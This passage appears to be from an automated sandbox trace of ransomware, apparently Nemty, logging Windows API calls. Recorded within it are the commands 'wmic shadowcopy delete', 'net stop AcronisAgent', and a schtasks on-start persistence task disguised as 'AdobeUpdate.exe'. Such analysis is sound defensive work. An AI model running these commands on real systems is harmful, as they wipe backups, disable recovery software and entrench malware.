Flags=0x0, MemoryPointer=0x474d88) returned 0x5e [0072.927] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.927] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x474df0 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x474f18 [0072.927] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474f18, Size=0x122) returned 0x474f18 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474f18) returned 0x122 [0072.927] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x475048 [0072.927] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x475048, Size=0x76) returned 0x475048 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475048) returned 0x76 [0072.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.927] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.927] GetLastError () returned 0x2 [0072.927] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.928] GetLastError () returned 0x2 [0072.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.928] GetLastError () returned 0x2 [0072.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.928] GetLastError () returned 0x2 [0072.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.928] GetLastError () returned 0x2 [0072.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.928] GetLastError () returned 0x2 [0072.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0x472ef0 [0072.929] GetProcessHeap () returned 0x460000 [0072.929] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4737d0, Size=0x4) returned 0x4737d0 [0072.929] FindClose (in: hFindFile=0x472ef0 | out: hFindFile=0x472ef0) returned 1 [0072.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.929] GetLastError () returned 0x2 [0072.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0x472ef0 [0072.929] FindClose (in: hFindFile=0x472ef0 | out: hFindFile=0x472ef0) returned 1 [0072.929] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0072.929] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0072.929] GetConsoleTitleW (in: lpConsoleTitle=0x36f190, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.929] InitializeProcThreadAttributeList (in: lpAttributeList=0x36f018, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x36f0e0 | out: lpAttributeList=0x36f018, lpSize=0x36f0e0) returned 1 [0072.929] UpdateProcThreadAttribute (in: lpAttributeList=0x36f018, dwFlags=0x0, Attribute=0x60001, lpValue=0x36f0d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x36f018, lpPreviousValue=0x0) returned 1 [0072.929] GetStartupInfoW (in: lpStartupInfo=0x36efd4 | out: lpStartupInfo=0x36efd4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0072.929] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x4747b8 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0072.930] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0072.931] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0072.931] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0072.931] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0072.931] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0072.931] GetProcessHeap () returned 0x460000 [0072.931] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4747b8 | out: hHeap=0x460000) returned 1 [0072.931] GetProcessHeap () returned 0x460000 [0072.931] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa) returned 0x470128 [0072.931] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0072.931] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x36f074*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36f0c0 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x36f0c0*(hProcess=0x74, hThread=0x78, dwProcessId=0x86c, dwThreadId=0x8b0)) returned 1 [0073.035] CloseHandle (hObject=0x78) returned 1 [0073.035] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0073.035] GetProcessHeap () returned 0x460000 [0073.035] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4754b8 | out: hHeap=0x460000) returned 1 [0073.035] GetEnvironmentStringsW () returned 0x4750c8* [0073.035] GetProcessHeap () returned 0x460000 [0073.035] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x478fb8 [0073.035] FreeEnvironmentStringsW (penv=0x4750c8) returned 1 [0073.035] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0075.607] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x36efb4 | out: lpExitCode=0x36efb4*=0x80041014) returned 1 [0075.608] CloseHandle (hObject=0x74) returned 1 [0075.608] _vsnwprintf (in: _Buffer=0x36f0fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x36efc0 | out: _Buffer="80041014") returned 8 [0075.608] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0075.608] GetProcessHeap () returned 0x460000 [0075.608] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478fb8 | out: hHeap=0x460000) returned 1 [0075.608] GetEnvironmentStringsW () returned 0x4750c8* [0075.608] GetProcessHeap () returned 0x460000 [0075.608] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x478fb8 [0075.608] FreeEnvironmentStringsW (penv=0x4750c8) returned 1 [0075.608] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0075.608] GetProcessHeap () returned 0x460000 [0075.608] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478fb8 | out: hHeap=0x460000) returned 1 [0075.608] GetEnvironmentStringsW () returned 0x4750c8* [0075.608] GetProcessHeap () returned 0x460000 [0075.608] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x478fb8 [0075.608] FreeEnvironmentStringsW (penv=0x4750c8) returned 1 [0075.608] GetProcessHeap () returned 0x460000 [0075.608] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470128 | out: hHeap=0x460000) returned 1 [0075.608] DeleteProcThreadAttributeList (in: lpAttributeList=0x36f018 | out: lpAttributeList=0x36f018) [0075.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.609] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0075.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.609] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0075.610] _get_osfhandle (_FileHandle=0) returned 0x3 [0075.610] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0075.610] SetConsoleInputExeNameW () returned 0x1 [0075.610] GetConsoleOutputCP () returned 0x1b5 [0075.610] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0075.610] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.610] exit (_Code=-2147217388) Process: id = "43" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x78b8c000" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x508" cmd_line = "net stop AcronisAgent" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 166 os_tid = 0x89c Process: id = "44" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x16408000" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xa14" cmd_line = "schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 167 os_tid = 0xa2c [0071.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fb8c | out: lpSystemTimeAsFileTime=0x13fb8c*(dwLowDateTime=0x99169050, dwHighDateTime=0x1d57b18)) [0071.086] GetCurrentProcessId () returned 0x9e0 [0071.086] GetCurrentThreadId () returned 0xa2c [0071.086] GetTickCount () returned 0x114bac8 [0071.086] RtlQueryPerformanceCounter () returned 0x1 [0071.087] GetModuleHandleA (lpModuleName=0x0) returned 0xfb0000 [0071.087] __set_app_type (_Type=0x1) [0071.087] __p__fmode () returned 0x74eb31f4 [0071.087] __p__commode () returned 0x74eb31fc [0071.087] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfc7881) returned 0x0 [0071.087] __wgetmainargs (in: _Argc=0xfd9e6c, _Argv=0xfd9e74, _Env=0xfd9e70, _DoWildCard=0, _StartInfo=0xfd9e80 | out: _Argc=0xfd9e6c, _Argv=0xfd9e74, _Env=0xfd9e70) returned 0 [0071.088] _onexit (_Func=0xfd0fe2) returned 0xfd0fe2 [0071.088] _onexit (_Func=0xfd0ff3) returned 0xfd0ff3 [0071.088] _onexit (_Func=0xfd1002) returned 0xfd1002 [0071.088] _onexit (_Func=0xfd101e) returned 0xfd101e [0071.088] _onexit (_Func=0xfd103a) returned 0xfd103a [0071.088] _onexit (_Func=0xfd1056) returned 0xfd1056 [0071.088] _onexit (_Func=0xfd1072) returned 0xfd1072 [0071.088] _onexit (_Func=0xfd108e) returned 0xfd108e [0071.088] _onexit (_Func=0xfd10aa) returned 0xfd10aa [0071.089] _onexit (_Func=0xfd10c6) returned 0xfd10c6 [0071.089] _onexit (_Func=0xfd10e2) returned 0xfd10e2 [0071.089] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.089] WinSqmIsOptedIn () returned 0x0 [0071.089] GetProcessHeap () returned 0x480000 [0071.089] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494c78 [0071.089] SetLastError (dwErrCode=0x0) [0071.089] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0071.090] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0071.090] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0071.090] VerifyVersionInfoW (in: lpVersionInformation=0x13f604, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13f604) returned 1 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494c90 [0071.090] lstrlenW (lpString="") returned 0 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x2) returned 0x495060 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495070 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494ca8 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495090 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4950b0 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4950d0 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4950f0 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494cc0 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495110 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495130 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495150 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495170 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494cd8 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495190 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4951c8 [0071.090] GetProcessHeap () returned 0x480000 [0071.090] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4951e8 [0071.090] GetProcessHeap () returned 0x480000 [0071.091] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495208 [0071.091] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.093] SetLastError (dwErrCode=0x0) [0071.093] GetProcessHeap () returned 0x480000 [0071.093] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495228 [0071.093] GetProcessHeap () returned 0x480000 [0071.093] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495248 [0071.093] GetProcessHeap () returned 0x480000 [0071.093] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495268 [0071.094] GetProcessHeap () returned 0x480000 [0071.094] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495288 [0071.094] GetProcessHeap () returned 0x480000 [0071.094] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4952a8 [0071.094] GetProcessHeap () returned 0x480000 [0071.094] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494cf0 [0071.094] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.094] GetProcessHeap () returned 0x480000 [0071.094] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x208) returned 0x495b30 [0071.094] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x495b30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0071.094] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74ad0000 [0071.095] GetProcAddress (hModule=0x74ad0000, lpProcName="GetFileVersionInfoSizeW") returned 0x74ad19d9 [0071.095] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0071.095] GetProcessHeap () returned 0x480000 [0071.095] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x74e) returned 0x495d40 [0071.095] GetProcAddress (hModule=0x74ad0000, lpProcName="GetFileVersionInfoW") returned 0x74ad19f4 [0071.096] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x495d40 | out: lpData=0x495d40) returned 1 [0071.096] GetProcAddress (hModule=0x74ad0000, lpProcName="VerQueryValueW") returned 0x74ad1b51 [0071.096] VerQueryValueW (in: pBlock=0x495d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13f70c, puLen=0x13f710 | out: lplpBuffer=0x13f70c*=0x4960dc, puLen=0x13f710) returned 1 [0071.097] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.097] _vsnwprintf (in: _Buffer=0x495b30, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13f6f4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0071.097] VerQueryValueW (in: pBlock=0x495d40, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13f71c, puLen=0x13f718 | out: lplpBuffer=0x13f71c*=0x495f08, puLen=0x13f718) returned 1 [0071.097] lstrlenW (lpString="schtasks.exe") returned 12 [0071.097] lstrlenW (lpString="schtasks.exe") returned 12 [0071.097] lstrlenW (lpString=".EXE") returned 4 [0071.097] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0071.099] lstrlenW (lpString="schtasks.exe") returned 12 [0071.099] lstrlenW (lpString=".EXE") returned 4 [0071.099] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.099] lstrlenW (lpString="schtasks") returned 8 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4952e8 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495308 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495328 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495348 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494d50 [0071.100] _memicmp (_Buf1=0x494d50, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xa0) returned 0x496720 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495368 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495388 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4953a8 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494d68 [0071.100] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x200) returned 0x4967c8 [0071.100] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0071.100] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0071.100] GetProcessHeap () returned 0x480000 [0071.100] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x30) returned 0x4969d0 [0071.101] _vsnwprintf (in: _Buffer=0x496720, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13f6f8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0071.101] GetProcessHeap () returned 0x480000 [0071.101] GetProcessHeap () returned 0x480000 [0071.101] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495d40) returned 1 [0071.101] GetProcessHeap () returned 0x480000 [0071.101] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495d40) returned 0x74e [0071.101] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495d40 | out: hHeap=0x480000) returned 1 [0071.101] SetLastError (dwErrCode=0x0) [0071.101] GetThreadLocale () returned 0x409 [0071.101] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", 